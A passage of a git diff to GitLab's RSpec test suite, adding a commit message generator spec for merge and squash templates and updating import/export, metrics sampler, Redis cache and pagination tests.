award_emoji: - awardable - user diff --git a/spec/lib/gitlab/import_export/attributes_permitter_spec.rb b/spec/lib/gitlab/import_export/attributes_permitter_spec.rb index 8ae387d95e3..c748f966463 100644 --- a/spec/lib/gitlab/import_export/attributes_permitter_spec.rb +++ b/spec/lib/gitlab/import_export/attributes_permitter_spec.rb @@ -140,6 +140,7 @@ RSpec.describe Gitlab::ImportExport::AttributesPermitter do :zoom_meetings | true :issues | true :group_members | true + :project | true end with_them do @@ -150,7 +151,11 @@ RSpec.describe Gitlab::ImportExport::AttributesPermitter do describe 'included_attributes for Project' do subject { described_class.new } - additional_attributes = { user: %w[id] } + # these are attributes for which either a special exception is made or are available only via included modules and not attribute introspection + additional_attributes = { + user: %w[id], + project: %w[auto_devops_deploy_strategy auto_devops_enabled issues_enabled jobs_enabled merge_requests_enabled snippets_enabled wiki_enabled build_git_strategy build_enabled security_and_compliance_enabled requirements_enabled] + } Gitlab::ImportExport::Config.new.to_h[:included_attributes].each do |relation_sym, permitted_attributes| context "for #{relation_sym}" do diff --git a/spec/lib/gitlab/import_export/project/tree_restorer_spec.rb b/spec/lib/gitlab/import_export/project/tree_restorer_spec.rb index 6bb6be07749..1d8b137c196 100644 --- a/spec/lib/gitlab/import_export/project/tree_restorer_spec.rb +++ b/spec/lib/gitlab/import_export/project/tree_restorer_spec.rb @@ -3,7 +3,7 @@ require 'spec_helper' def match_mr1_note(content_regex) - MergeRequest.find_by(title: 'MR1').notes.select { |n| n.note.match(/#{content_regex}/)}.first + MergeRequest.find_by(title: 'MR1').notes.find { |n| n.note.match(/#{content_regex}/) } end RSpec.describe Gitlab::ImportExport::Project::TreeRestorer do @@ -75,7 +75,7 @@ RSpec.describe Gitlab::ImportExport::Project::TreeRestorer do context 'for an Issue' do it 'does not import note_html' do note_content = 'Quo reprehenderit aliquam qui dicta impedit cupiditate eligendi' - issue_note = Issue.find_by(description: 'Aliquam enim illo et possimus.').notes.select { |n| n.note.match(/#{note_content}/)}.first + issue_note = Issue.find_by(description: 'Aliquam enim illo et possimus.').notes.find { |n| n.note.match(/#{note_content}/) } expect(issue_note.note_html).to match(/#{note_content}/) end @@ -552,7 +552,7 @@ RSpec.describe Gitlab::ImportExport::Project::TreeRestorer do it 'issue system note metadata restored successfully' do note_content = 'created merge request !1 to address this issue' - note = project.issues.first.notes.select { |n| n.note.match(/#{note_content}/)}.first + note = project.issues.first.notes.find { |n| n.note.match(/#{note_content}/)} expect(note.noteable_type).to eq('Issue') expect(note.system).to eq(true) diff --git a/spec/lib/gitlab/import_export/safe_model_attributes.yml b/spec/lib/gitlab/import_export/safe_model_attributes.yml index 9daa3b32fd1..6ffe2187466 100644 --- a/spec/lib/gitlab/import_export/safe_model_attributes.yml +++ b/spec/lib/gitlab/import_export/safe_model_attributes.yml @@ -33,6 +33,7 @@ Issue: - health_status - external_key - issue_type +- email_message_id Event: - id - target_type @@ -562,6 +563,7 @@ Project: - autoclose_referenced_issues - suggestion_commit_message - merge_commit_template +- squash_commit_template ProjectTracingSetting: - external_url Author: diff --git a/spec/lib/gitlab/lets_encrypt/client_spec.rb b/spec/lib/gitlab/lets_encrypt/client_spec.rb index 54b9bd3bfba..f1284318687 100644 --- a/spec/lib/gitlab/lets_encrypt/client_spec.rb +++ b/spec/lib/gitlab/lets_encrypt/client_spec.rb @@ -73,7 +73,7 @@ RSpec.describe ::Gitlab::LetsEncrypt::Client do subject(:new_order) { client.new_order('example.com') } before do - order_double = instance_double('Acme::Order') + order_double = double('Acme::Order') allow(stub_client).to receive(:new_order).and_return(order_double) end @@ -107,7 +107,7 @@ RSpec.describe ::Gitlab::LetsEncrypt::Client do subject { client.load_challenge(url) } before do - acme_challenge = instance_double('Acme::Client::Resources::Challenge') + acme_challenge = double('Acme::Client::Resources::Challenge') allow(stub_client).to receive(:challenge).with(url: url).and_return(acme_challenge) end diff --git a/spec/lib/gitlab/lograge/custom_options_spec.rb b/spec/lib/gitlab/lograge/custom_options_spec.rb index a4ae39a835a..d8f351bb8a3 100644 --- a/spec/lib/gitlab/lograge/custom_options_spec.rb +++ b/spec/lib/gitlab/lograge/custom_options_spec.rb @@ -95,5 +95,55 @@ RSpec.describe Gitlab::Lograge::CustomOptions do expect(subject[correlation_id_key]).to eq('123456') end end + + context 'when feature flags are present', :request_store do + before do + allow(Feature).to receive(:log_feature_flag_states?).and_return(false) + + definitions = {} + [:enabled_feature, :disabled_feature].each do |flag_name| + definitions[flag_name] = Feature::Definition.new("development/enabled_feature.yml", + name: flag_name, + type: 'development', + log_state_changes: true, + default_enabled: false) + + allow(Feature).to receive(:log_feature_flag_states?).with(flag_name).and_call_original + end + + allow(Feature::Definition).to receive(:definitions).and_return(definitions) + + Feature.enable(:enabled_feature) + Feature.disable(:disabled_feature) + end + + context 'and :feature_flag_log_states is enabled' do + before do + Feature.enable(:feature_flag_state_logs) + end + + it 'adds feature flag events' do + Feature.enabled?(:enabled_feature) + Feature.enabled?(:disabled_feature) + + expect(subject).to have_key(:feature_flag_states) + expect(subject[:feature_flag_states]).to match_array(%w[enabled_feature:1 disabled_feature:0]) + end + end + + context 'and :feature_flag_log_states is disabled' do + before do + Feature.disable(:feature_flag_state_logs) + end + + it 'does not track or add feature flag events' do + Feature.enabled?(:enabled_feature) + Feature.enabled?(:disabled_feature) + + expect(subject).not_to have_key(:feature_flag_states) + expect(Feature).not_to receive(:log_feature_flag_state) + end + end + end end end diff --git a/spec/lib/gitlab/merge_requests/commit_message_generator_spec.rb b/spec/lib/gitlab/merge_requests/commit_message_generator_spec.rb new file mode 100644 index 00000000000..65c76aac10c --- /dev/null +++ b/spec/lib/gitlab/merge_requests/commit_message_generator_spec.rb @@ -0,0 +1,290 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::MergeRequests::CommitMessageGenerator do + let(:merge_commit_template) { nil } + let(:squash_commit_template) { nil } + let(:project) do + create( + :project, + :public, + :repository, + merge_commit_template: merge_commit_template, + squash_commit_template: squash_commit_template + ) + end + + let(:user) { project.creator } + let(:source_branch) { 'feature' } + let(:merge_request_description) { "Merge Request Description\nNext line" } + let(:merge_request_title) { 'Bugfix' } + let(:merge_request) do + create( + :merge_request, + :simple, + source_project: project, + target_project: project, + target_branch: 'master', + source_branch: source_branch, + author: user, + description: merge_request_description, + title: merge_request_title + ) + end + + subject { described_class.new(merge_request: merge_request) } + + shared_examples_for 'commit message with template' do |message_template_name| + it 'returns nil when template is not set in target project' do + expect(result_message).to be_nil + end + + context 'when project has custom commit template' do + let(message_template_name) { <<~MSG.rstrip } + %{title} + + See merge request %{reference} + MSG + + it 'uses custom template' do + expect(result_message).to eq <<~MSG.rstrip + Bugfix + + See merge request #{merge_request.to_reference(full: true)} + MSG + end + end + + context 'when project has commit template with closed issues' do + let(message_template_name) { <<~MSG.rstrip } + Merge branch '%{source_branch}' into '%{target_branch}' + + %{title} + + %{issues} + + See merge request %{reference} + MSG + + it 'omits issues and new lines when no issues are mentioned in description' do + expect(result_message).to eq <<~MSG.rstrip + Merge branch 'feature' into 'master' + + Bugfix + + See merge request #{merge_request.to_reference(full: true)} + MSG + end + + context 'when MR closes issues' do + let(:issue_1) { create(:issue, project: project) } + let(:issue_2) { create(:issue, project: project) } + let(:merge_request_description) { "Description\n\nclosing #{issue_1.to_reference}, #{issue_2.to_reference}" } + + it 'includes them and keeps new line characters' do + expect(result_message).to eq <<~MSG.rstrip + Merge branch 'feature' into 'master' + + Bugfix + + Closes #{issue_1.to_reference} and #{issue_2.to_reference} + + See merge request #{merge_request.to_reference(full: true)} + MSG + end + end + end + + context 'when project has commit template with description' do + let(message_template_name) { <<~MSG.rstrip } + Merge branch '%{source_branch}' into '%{target_branch}' + + %{title} + + %{description} + + See merge request %{reference} + MSG + + it 'uses template' do + expect(result_message).to eq <<~MSG.rstrip + Merge branch 'feature' into 'master' + + Bugfix + + Merge Request Description + Next line + + See merge request #{merge_request.to_reference(full: true)} + MSG + end + + context 'when description is empty string' do + let(:merge_request_description) { '' } + + it 'skips description placeholder and removes new line characters before it' do + expect(result_message).to eq <<~MSG.rstrip + Merge branch 'feature' into 'master' + + Bugfix + + See merge request #{merge_request.to_reference(full: true)} + MSG + end + end + + context 'when description is nil' do + let(:merge_request_description) { nil } + + it 'skips description placeholder and removes new line characters before it' do + expect(result_message).to eq <<~MSG.rstrip + Merge branch 'feature' into 'master' + + Bugfix + + See merge request #{merge_request.to_reference(full: true)} + MSG + end + end + + context 'when description is blank string' do + let(:merge_request_description) { "\n\r \n" } + + it 'skips description placeholder and removes new line characters before it' do + expect(result_message).to eq <<~MSG.rstrip + Merge branch 'feature' into 'master' + + Bugfix + + See merge request #{merge_request.to_reference(full: true)} + MSG + end + end + end + + context 'when custom commit template contains placeholder in the middle or beginning of the line' do + let(message_template_name) { <<~MSG.rstrip } + Merge branch '%{source_branch}' into '%{target_branch}' + + %{description} %{title} + + See merge request %{reference} + MSG + + it 'uses custom template' do + expect(result_message).to eq <<~MSG.rstrip + Merge branch 'feature' into 'master' + + Merge Request Description + Next line Bugfix + + See merge request #{merge_request.to_reference(full: true)} + MSG + end + + context 'when description is empty string' do + let(:merge_request_description) { '' } + + it 'does not remove new line characters before empty placeholder' do + expect(result_message).to eq <<~MSG.rstrip + Merge branch 'feature' into 'master' + + Bugfix + + See merge request #{merge_request.to_reference(full: true)} + MSG + end + end + end + + context 'when project has template with CRLF newlines' do + let(message_template_name) do + "Merge branch '%{source_branch}' into '%{target_branch}'\r\n\r\n%{title}\r\n\r\n%{description}\r\n\r\nSee merge request %{reference}" + end + + it 'converts it to LF newlines' do + expect(result_message).to eq <<~MSG.rstrip + Merge branch 'feature' into 'master' + + Bugfix + + Merge Request Description + Next line + + See merge request #{merge_request.to_reference(full: true)} + MSG + end + + context 'when description is empty string' do + let(:merge_request_description) { '' } + + it 'skips description placeholder and removes new line characters before it' do + expect(result_message).to eq <<~MSG.rstrip + Merge branch 'feature' into 'master' + + Bugfix + + See merge request #{merge_request.to_reference(full: true)} + MSG + end + end + + context 'when project has merge commit template with first_commit' do + let(message_template_name) { <<~MSG.rstrip } + Message: %{first_commit} + MSG + + it 'uses first commit' do + expect(result_message).to eq <<~MSG.rstrip + Message: Feature added + + Signed-off-by: Dmitriy Zaporozhets <dmitriy.zaporozhets@gmail.com> + MSG + end + + context 'when branch has no unmerged commits' do + let(:source_branch) { 'v1.1.0' } + + it 'is an empty string' do + expect(result_message).to eq 'Message: ' + end + end + end + + context 'when project has merge commit template with first_multiline_commit' do + let(message_template_name) { <<~MSG.rstrip } + Message: %{first_multiline_commit} + MSG + + it 'uses first multiline commit' do + expect(result_message).to eq <<~MSG.rstrip + Message: Feature added + + Signed-off-by: Dmitriy Zaporozhets <dmitriy.zaporozhets@gmail.com> + MSG + end + + context 'when branch has no multiline commits' do + let(:source_branch) { 'spooky-stuff' } + + it 'is mr title' do + expect(result_message).to eq 'Message: Bugfix' + end + end + end + end + end + + describe '#merge_message' do + let(:result_message) { subject.merge_message } + + it_behaves_like 'commit message with template', :merge_commit_template + end + + describe '#squash_message' do + let(:result_message) { subject.squash_message } + + it_behaves_like 'commit message with template', :squash_commit_template + end +end diff --git a/spec/lib/gitlab/merge_requests/merge_commit_message_spec.rb b/spec/lib/gitlab/merge_requests/merge_commit_message_spec.rb deleted file mode 100644 index 884f8df5e56..00000000000 --- a/spec/lib/gitlab/merge_requests/merge_commit_message_spec.rb +++ /dev/null @@ -1,219 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::MergeRequests::MergeCommitMessage do - let(:merge_commit_template) { nil } - let(:project) { create(:project, :public, :repository, merge_commit_template: merge_commit_template) } - let(:user) { project.creator } - let(:merge_request_description) { "Merge Request Description\nNext line" } - let(:merge_request_title) { 'Bugfix' } - let(:merge_request) do - create( - :merge_request, - :simple, - source_project: project, - target_project: project, - author: user, - description: merge_request_description, - title: merge_request_title - ) - end - - subject { described_class.new(merge_request: merge_request) } - - it 'returns nil when template is not set in target project' do - expect(subject.message).to be_nil - end - - context 'when project has custom merge commit template' do - let(:merge_commit_template) { <<~MSG.rstrip } - %{title} - - See merge request %{reference} - MSG - - it 'uses custom template' do - expect(subject.message).to eq <<~MSG.rstrip - Bugfix - - See merge request #{merge_request.to_reference(full: true)} - MSG - end - end - - context 'when project has merge commit template with closed issues' do - let(:merge_commit_template) { <<~MSG.rstrip } - Merge branch '%{source_branch}' into '%{target_branch}' - - %{title} - - %{issues} - - See merge request %{reference} - MSG - - it 'omits issues and new lines when no issues are mentioned in description' do - expect(subject.message).to eq <<~MSG.rstrip - Merge branch 'feature' into 'master' - - Bugfix - - See merge request #{merge_request.to_reference(full: true)} - MSG - end - - context 'when MR closes issues' do - let(:issue_1) { create(:issue, project: project) } - let(:issue_2) { create(:issue, project: project) } - let(:merge_request_description) { "Description\n\nclosing #{issue_1.to_reference}, #{issue_2.to_reference}" } - - it 'includes them and keeps new line characters' do - expect(subject.message).to eq <<~MSG.rstrip - Merge branch 'feature' into 'master' - - Bugfix - - Closes #{issue_1.to_reference} and #{issue_2.to_reference} - - See merge request #{merge_request.to_reference(full: true)} - MSG - end - end - end - - context 'when project has merge commit template with description' do - let(:merge_commit_template) { <<~MSG.rstrip } - Merge branch '%{source_branch}' into '%{target_branch}' - - %{title} - - %{description} - - See merge request %{reference} - MSG - - it 'uses template' do - expect(subject.message).to eq <<~MSG.rstrip - Merge branch 'feature' into 'master' - - Bugfix - - Merge Request Description - Next line - - See merge request #{merge_request.to_reference(full: true)} - MSG - end - - context 'when description is empty string' do - let(:merge_request_description) { '' } - - it 'skips description placeholder and removes new line characters before it' do - expect(subject.message).to eq <<~MSG.rstrip - Merge branch 'feature' into 'master' - - Bugfix - - See merge request #{merge_request.to_reference(full: true)} - MSG - end - end - - context 'when description is nil' do - let(:merge_request_description) { nil } - - it 'skips description placeholder and removes new line characters before it' do - expect(subject.message).to eq <<~MSG.rstrip - Merge branch 'feature' into 'master' - - Bugfix - - See merge request #{merge_request.to_reference(full: true)} - MSG - end - end - - context 'when description is blank string' do - let(:merge_request_description) { "\n\r \n" } - - it 'skips description placeholder and removes new line characters before it' do - expect(subject.message).to eq <<~MSG.rstrip - Merge branch 'feature' into 'master' - - Bugfix - - See merge request #{merge_request.to_reference(full: true)} - MSG - end - end - end - - context 'when custom merge commit template contains placeholder in the middle or beginning of the line' do - let(:merge_commit_template) { <<~MSG.rstrip } - Merge branch '%{source_branch}' into '%{target_branch}' - - %{description} %{title} - - See merge request %{reference} - MSG - - it 'uses custom template' do - expect(subject.message).to eq <<~MSG.rstrip - Merge branch 'feature' into 'master' - - Merge Request Description - Next line Bugfix - - See merge request #{merge_request.to_reference(full: true)} - MSG - end - - context 'when description is empty string' do - let(:merge_request_description) { '' } - - it 'does not remove new line characters before empty placeholder' do - expect(subject.message).to eq <<~MSG.rstrip - Merge branch 'feature' into 'master' - - Bugfix - - See merge request #{merge_request.to_reference(full: true)} - MSG - end - end - end - - context 'when project has template with CRLF newlines' do - let(:merge_commit_template) do - "Merge branch '%{source_branch}' into '%{target_branch}'\r\n\r\n%{title}\r\n\r\n%{description}\r\n\r\nSee merge request %{reference}" - end - - it 'converts it to LF newlines' do - expect(subject.message).to eq <<~MSG.rstrip - Merge branch 'feature' into 'master' - - Bugfix - - Merge Request Description - Next line - - See merge request #{merge_request.to_reference(full: true)} - MSG - end - - context 'when description is empty string' do - let(:merge_request_description) { '' } - - it 'skips description placeholder and removes new line characters before it' do - expect(subject.message).to eq <<~MSG.rstrip - Merge branch 'feature' into 'master' - - Bugfix - - See merge request #{merge_request.to_reference(full: true)} - MSG - end - end - end -end diff --git a/spec/lib/gitlab/merge_requests/mergeability/redis_interface_spec.rb b/spec/lib/gitlab/merge_requests/mergeability/redis_interface_spec.rb index e5475d04d86..2471faf76b2 100644 --- a/spec/lib/gitlab/merge_requests/mergeability/redis_interface_spec.rb +++ b/spec/lib/gitlab/merge_requests/mergeability/redis_interface_spec.rb @@ -2,7 +2,7 @@ require 'spec_helper' -RSpec.describe Gitlab::MergeRequests::Mergeability::RedisInterface, :clean_gitlab_redis_shared_state do +RSpec.describe Gitlab::MergeRequests::Mergeability::RedisInterface, :clean_gitlab_redis_cache do subject(:redis_interface) { described_class.new } let(:merge_check) { double(cache_key: '13') } @@ -11,17 +11,17 @@ RSpec.describe Gitlab::MergeRequests::Mergeability::RedisInterface, :clean_gitla describe '#save_check' do it 'saves the hash' do - expect(Gitlab::Redis::SharedState.with { |redis| redis.get(expected_key) }).to be_nil + expect(Gitlab::Redis::Cache.with { |redis| redis.get(expected_key) }).to be_nil redis_interface.save_check(merge_check: merge_check, result_hash: result_hash) - expect(Gitlab::Redis::SharedState.with { |redis| redis.get(expected_key) }).to eq result_hash.to_json + expect(Gitlab::Redis::Cache.with { |redis| redis.get(expected_key) }).to eq result_hash.to_json end end describe '#retrieve_check' do it 'returns the hash' do - Gitlab::Redis::SharedState.with { |redis| redis.set(expected_key, result_hash.to_json) } + Gitlab::Redis::Cache.with { |redis| redis.set(expected_key, result_hash.to_json) } expect(redis_interface.retrieve_check(merge_check: merge_check)).to eq result_hash end diff --git a/spec/lib/gitlab/metrics/exporter/base_exporter_spec.rb b/spec/lib/gitlab/metrics/exporter/base_exporter_spec.rb index e4f85243528..9cd1ef4094e 100644 --- a/spec/lib/gitlab/metrics/exporter/base_exporter_spec.rb +++ b/spec/lib/gitlab/metrics/exporter/base_exporter_spec.rb @@ -3,9 +3,9 @@ require 'spec_helper' RSpec.describe Gitlab::Metrics::Exporter::BaseExporter do - let(:exporter) { described_class.new } - let(:log_filename) { File.join(Rails.root, 'log', 'sidekiq_exporter.log') } let(:settings) { double('settings') } + let(:exporter) { described_class.new(settings) } + let(:log_filename) { File.join(Rails.root, 'log', 'sidekiq_exporter.log') } before do allow_any_instance_of(described_class).to receive(:log_filename).and_return(log_filename) diff --git a/spec/lib/gitlab/metrics/exporter/sidekiq_exporter_spec.rb b/spec/lib/gitlab/metrics/exporter/sidekiq_exporter_spec.rb index 01cf47a7c58..75bc3ba9626 100644 --- a/spec/lib/gitlab/metrics/exporter/sidekiq_exporter_spec.rb +++ b/spec/lib/gitlab/metrics/exporter/sidekiq_exporter_spec.rb @@ -3,7 +3,7 @@ require 'spec_helper' RSpec.describe Gitlab::Metrics::Exporter::SidekiqExporter do - let(:exporter) { described_class.new } + let(:exporter) { described_class.new(Settings.monitoring.sidekiq_exporter) } after do exporter.stop @@ -50,40 +50,4 @@ RSpec.describe Gitlab::Metrics::Exporter::SidekiqExporter do expect(exporter.log_filename).to end_with('sidekiq_exporter.log') end end - - context 'when port is already taken' do - let(:first_exporter) { described_class.new } - - before do - stub_config( - monitoring: { - sidekiq_exporter: { - enabled: true, - port: 9992, - address: '127.0.0.1' - } - } - ) - - first_exporter.start - end - - after do - first_exporter.stop - end - - it 'does print error message' do - expect(Sidekiq.logger).to receive(:error) - .with( - class: described_class.to_s, - message: 'Cannot start sidekiq_exporter', - 'exception.message' => anything) - - exporter.start - end - - it 'does not start thread' do - expect(exporter.start).to be_nil - end - end end diff --git a/spec/lib/gitlab/metrics/samplers/database_sampler_spec.rb b/spec/lib/gitlab/metrics/samplers/database_sampler_spec.rb index e97a4fdddcb..e8f8947c9e8 100644 --- a/spec/lib/gitlab/metrics/samplers/database_sampler_spec.rb +++ b/spec/lib/gitlab/metrics/samplers/database_sampler_spec.rb @@ -8,44 +8,169 @@ RSpec.describe Gitlab::Metrics::Samplers::DatabaseSampler do it_behaves_like 'metrics sampler', 'DATABASE_SAMPLER' describe '#sample' do + let(:main_labels) do + { + class: 'ActiveRecord::Base', + host: ApplicationRecord.database.config['host'], + port: ApplicationRecord.database.config['port'], + db_config_name: 'main' + } + end + + let(:ci_labels) do + { + class: 'Ci::ApplicationRecord', + host: Ci::ApplicationRecord.database.config['host'], + port: Ci::ApplicationRecord.database.config['port'], + db_config_name: 'ci' + } + end + + let(:main_replica_labels) do + { + class: 'ActiveRecord::Base', + host: 'main-replica-host', + port: 2345, + db_config_name: 'main_replica' + } + end + + let(:ci_replica_labels) do + { + class: 'Ci::ApplicationRecord', + host: 'ci-replica-host', + port: 3456, + db_config_name: 'ci_replica' + } + end + before do described_class::METRIC_DESCRIPTIONS.each_key do |metric| allow(subject.metrics[metric]).to receive(:set) end + + allow(Gitlab::Database).to receive(:database_base_models) + .and_return({ main: ActiveRecord::Base, ci: Ci::ApplicationRecord }) end - context 'for ActiveRecord::Base' do - let(:labels) do - { - class: 'ActiveRecord::Base', - host: ApplicationRecord.database.config['host'], - port: ApplicationRecord.database.config['port'] - } + context 'when all base models are connected', :add_ci_connection do + it 'samples connection pool statistics for all primaries' do + expect_metrics_with_labels(main_labels) + expect_metrics_with_labels(ci_labels) + + subject.sample end - context 'when the database is connected' do - it 'samples connection pool statistics' do - expect(subject.metrics[:size]).to receive(:set).with(labels, a_value >= 1) - expect(subject.metrics[:connections]).to receive(:set).with(labels, a_value >= 1) - expect(subject.metrics[:busy]).to receive(:set).with(labels, a_value >= 1) - expect(subject.metrics[:dead]).to receive(:set).with(labels, a_value >= 0) - expect(subject.metrics[:waiting]).to receive(:set).with(labels, a_value >= 0) + context 'when replica hosts are configured' do + let(:main_load_balancer) { ActiveRecord::Base.load_balancer } # rubocop:disable Database/MultipleDatabases + let(:main_replica_host) { main_load_balancer.host } + + let(:ci_load_balancer) { double(:load_balancer, host_list: ci_host_list, configuration: configuration) } + let(:configuration) { double(:configuration, primary_connection_specification_name: 'Ci::ApplicationRecord') } + let(:ci_host_list) { double(:host_list, hosts: [ci_replica_host]) } + let(:ci_replica_host) { double(:host, connection: ci_connection) } + let(:ci_connection) { double(:connection, pool: Ci::ApplicationRecord.connection_pool) } + + before do + allow(Gitlab::Database::LoadBalancing).to receive(:each_load_balancer) + .and_return([main_load_balancer, ci_load_balancer].to_enum) + + allow(main_load_balancer).to receive(:primary_only?).and_return(false) + allow(ci_load_balancer).to receive(:primary_only?).and_return(false) + + allow(main_replica_host).to receive(:host).and_return('main-replica-host') + allow(ci_replica_host).to receive(:host).and_return('ci-replica-host') + + allow(main_replica_host).to receive(:port).and_return(2345) + allow(ci_replica_host).to receive(:port).and_return(3456) + + allow(Gitlab::Database).to receive(:db_config_name) + .with(main_replica_host.connection) + .and_return('main_replica') + + allow(Gitlab::Database).to receive(:db_config_name) + .with(ci_replica_host.connection) + .and_return('ci_replica') + end + + it 'samples connection pool statistics for primaries and replicas' do + expect_metrics_with_labels(main_labels) + expect_metrics_with_labels(ci_labels) + expect_metrics_with_labels(main_replica_labels) + expect_metrics_with_labels(ci_replica_labels) subject.sample end end + end + + context 'when a base model is not connected', :add_ci_connection do + before do + allow(Ci::ApplicationRecord).to receive(:connected?).and_return(false) + end + + it 'records no samples for that primary' do + expect_metrics_with_labels(main_labels) + expect_no_metrics_with_labels(ci_labels) + + subject.sample + end + + context 'when the base model has replica connections' do + let(:main_load_balancer) { ActiveRecord::Base.load_balancer } # rubocop:disable Database/MultipleDatabases + let(:main_replica_host) { main_load_balancer.host } + + let(:ci_load_balancer) { double(:load_balancer, host_list: ci_host_list, configuration: configuration) } + let(:configuration) { double(:configuration, primary_connection_specification_name: 'Ci::ApplicationRecord') } + let(:ci_host_list) { double(:host_list, hosts: [ci_replica_host]) } + let(:ci_replica_host) { double(:host, connection: ci_connection) } + let(:ci_connection) { double(:connection, pool: Ci::ApplicationRecord.connection_pool) } - context 'when the database is not connected' do before do - allow(ActiveRecord::Base).to receive(:connected?).and_return(false) + allow(Gitlab::Database::LoadBalancing).to receive(:each_load_balancer) + .and_return([main_load_balancer, ci_load_balancer].to_enum) + + allow(main_load_balancer).to receive(:primary_only?).and_return(false) + allow(ci_load_balancer).to receive(:primary_only?).and_return(false) + + allow(main_replica_host).to receive(:host).and_return('main-replica-host') + allow(ci_replica_host).to receive(:host).and_return('ci-replica-host') + + allow(main_replica_host).to receive(:port).and_return(2345) + allow(ci_replica_host).to receive(:port).and_return(3456) + + allow(Gitlab::Database).to receive(:db_config_name) + .with(main_replica_host.connection) + .and_return('main_replica') + + allow(Gitlab::Database).to receive(:db_config_name) + .with(ci_replica_host.connection) + .and_return('ci_replica') end - it 'records no samples' do - expect(subject.metrics[:size]).not_to receive(:set).with(labels, anything) + it 'still records the replica metrics' do + expect_metrics_with_labels(main_labels) + expect_metrics_with_labels(main_replica_labels) + expect_no_metrics_with_labels(ci_labels) + expect_metrics_with_labels(ci_replica_labels) subject.sample end end end + + def expect_metrics_with_labels(labels) + expect(subject.metrics[:size]).to receive(:set).with(labels, a_value >= 1) + expect(subject.metrics[:connections]).to receive(:set).with(labels, a_value >= 1) + expect(subject.metrics[:busy]).to receive(:set).with(labels, a_value >= 1) + expect(subject.metrics[:dead]).to receive(:set).with(labels, a_value >= 0) + expect(subject.metrics[:waiting]).to receive(:set).with(labels, a_value >= 0) + end + + def expect_no_metrics_with_labels(labels) + described_class::METRIC_DESCRIPTIONS.each_key do |metric| + expect(subject.metrics[metric]).not_to receive(:set).with(labels, anything) + end + end end end diff --git a/spec/lib/gitlab/metrics/subscribers/active_record_spec.rb b/spec/lib/gitlab/metrics/subscribers/active_record_spec.rb index a8e4f039da4..389b0ef1044 100644 --- a/spec/lib/gitlab/metrics/subscribers/active_record_spec.rb +++ b/spec/lib/gitlab/metrics/subscribers/active_record_spec.rb @@ -198,6 +198,7 @@ RSpec.describe Gitlab::Metrics::Subscribers::ActiveRecord do context 'query using a connection to a replica' do before do allow(Gitlab::Database::LoadBalancing).to receive(:db_role_for_connection).and_return(:replica) + allow(connection).to receive_message_chain(:pool, :db_config, :name).and_return(db_config_name) end it 'queries connection db role' do diff --git a/spec/lib/gitlab/multi_collection_paginator_spec.rb b/spec/lib/gitlab/multi_collection_paginator_spec.rb index c7c8f4f969f..080b3382684 100644 --- a/spec/lib/gitlab/multi_collection_paginator_spec.rb +++ b/spec/lib/gitlab/multi_collection_paginator_spec.rb @@ -40,7 +40,7 @@ RSpec.describe Gitlab::MultiCollectionPaginator do end it 'fils the last page with elements from the second collection' do - expected_collection = all_groups[-2..-1] + expected_collection = all_groups[-2..] expect(paginator.paginate(3)).to eq(expected_collection) end diff --git a/spec/lib/gitlab/pagination/keyset/order_spec.rb b/spec/lib/gitlab/pagination/keyset/order_spec.rb index 3c14d91fdfd..1bed8e542a2 100644 --- a/spec/lib/gitlab/pagination/keyset/order_spec.rb +++ b/spec/lib/gitlab/pagination/keyset/order_spec.rb @@ -127,7 +127,7 @@ RSpec.describe Gitlab::Pagination::Keyset::Order do end it do - expect(subject).to eq(expected.reverse[1..-1]) # removing one item because we used it to calculate cursor data for the "last" page in subject + expect(subject).to eq(expected.reverse[1..]) # removing one item because we used it to calculate cursor data for the "last" page in subject end end end diff --git a/spec/lib/gitlab/pagination/offset_pagination_spec.rb b/spec/lib/gitlab/pagination/offset_pagination_spec.rb index ffecbb06ff8..f8d50fbc517 100644 --- a/spec/lib/gitlab/pagination/offset_pagination_spec.rb +++ b/spec/lib/gitlab/pagination/offset_pagination_spec.rb @@ -82,7 +82,7 @@ RSpec.describe Gitlab::Pagination::OffsetPagination do context 'when the api_kaminari_count_with_limit feature flag is enabled' do before do - stub_feature_flags(api_kaminari_count_with_limit: true, lower_relation_max_count_limit: false) + stub_feature_flags(api_kaminari_count_with_limit: true) end context 'when resources count is less than MAX_COUNT_LIMIT' do @@ -120,41 +120,6 @@ RSpec.describe Gitlab::Pagination::OffsetPagination do end end - context 'when lower_relation_max_count_limit FF is enabled' do - before do - stub_feature_flags(lower_relation_max_count_limit: true) - end - - it_behaves_like 'paginated response' - it_behaves_like 'response with pagination headers' - - context 'when limit is met' do - before do - stub_const("::Kaminari::ActiveRecordRelationMethods::MAX_COUNT_NEW_LOWER_LIMIT", 2) - end - - it_behaves_like 'paginated response' - - it 'does not return the X-Total and X-Total-Pages headers' do - expect_no_header('X-Total') - expect_no_header('X-Total-Pages') - expect_header('X-Per-Page', '2') - expect_header('X-Page', '1') - expect_header('X-Next-Page', '2') - expect_header('X-Prev-Page', '') - - expect_header('Link', anything) do |_key, val| - expect(val).to include(%Q(<#{incoming_api_projects_url}?#{query.merge(page: 1).to_query}>; rel="first")) - expect(val).to include(%Q(<#{incoming_api_projects_url}?#{query.merge(page: 2).to_query}>; rel="next")) - expect(val).not_to include('rel="last"') - expect(val).not_to include('rel="prev"') - end - - subject.paginate(resource) - end - end - end - it 'does not return the total headers when excluding them' do expect_no_header('X-Total') expect_no_header('X-Total-Pages') diff --git a/spec/lib/gitlab/patch/legacy_database_config_spec.rb b/spec/lib/gitlab/patch/legacy_database_config_spec.rb index e6c0bdbf360..b87e16f31ae 100644 --- a/spec/lib/gitlab/patch/legacy_database_config_spec.rb +++ b/spec/lib/gitlab/patch/legacy_database_config_spec.rb @@ -11,6 +11,9 @@ RSpec.describe Gitlab::Patch::LegacyDatabaseConfig do let(:configuration) { Rails::Application::Configuration.new(Rails.root) } before do + allow(File).to receive(:exist?).and_call_original + allow(File).to receive(:exist?).with(Rails.root.join("config/database_geo.yml")).and_return(false) + # The `AS::ConfigurationFile` calls `read` in `def initialize` # thus we cannot use `expect_next_instance_of` # rubocop:disable RSpec/AnyInstanceOf diff --git a/spec/lib/gitlab/process_management_spec.rb b/spec/lib/gitlab/process_management_spec.rb new file mode 100644 index 00000000000..a71a476b540 --- /dev/null +++ b/spec/lib/gitlab/process_management_spec.rb @@ -0,0 +1,144 @@ +# frozen_string_literal: true + +require_relative '../../../lib/gitlab/process_management' + +RSpec.describe Gitlab::ProcessManagement do + describe '.trap_signals' do + it 'traps the given signals' do + expect(described_class).to receive(:trap).ordered.with(:INT) + expect(described_class).to receive(:trap).ordered.with(:HUP) + + 